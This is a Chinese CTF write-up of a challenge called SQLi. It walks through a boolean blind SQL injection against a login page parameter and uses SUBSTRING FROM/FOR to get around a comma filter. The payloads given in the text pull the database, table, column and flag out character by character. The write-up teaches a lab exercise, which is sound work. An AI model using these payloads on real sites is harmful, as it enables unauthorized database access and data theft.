“百度杯”CTF比赛 九月场 SQLi 解题思路

题目简介

题目名称：SQLi
题目内容：后台有获取flag的线索

解题思路

1. 打开地址使用burp抓包发现“l0gin.php?id=1”。

2. 打开“l0gin.php?id=1”地址

使用1’ and ‘1’=‘1（成功）和1’ and ‘1’='2（不成功），说明此处存在sql注入。测试中发现后台过滤了逗号，在这里使用from for代替逗号。

开始注入

• 猜测数据库名称
  猜测数据库名称的长度。代码：id=1' and (select length(database()))='4。
  爆破数据库名称，按位猜测每一位的字符。代码：substring((select database()) from 1 for 1)='q。
  这一步得出数据的名称“sqli”。

• 猜测表名称
  猜测表名的长度。代码：(select length(group_concat(table_name)) from information_schema.tables where table_schema='sqli')='5。
  爆破表名，按位猜测每一位的字符。代码：substring((select group_concat(table_name) from information_schema.tables where table_schema='sqli') from 1 for 1)='f。
  这一步得出表的名称“users”。

• 猜测列名称

  猜测列名测长度。代码：(select length(group_concat(column_name)) from information_schema.columns where table_name='users')='29。
  爆破列名，按位猜测每一位的字符。代码：substring((select group_concat(column_name) from information_schema.columns where table_name='users') from 1 for 1)='f。
  这一步得出列名“flag_9c861b688330”。

• 猜测值

  猜测值得长度。代码：(select length(group_concat(flag_9c861b688330)) from users)='47。
  爆破值，按位猜测每一位的字符。代码：substring((select group_concat(flag_9c861b688330) from users) from 1 for 1)='1。
  这一步得出列中的值。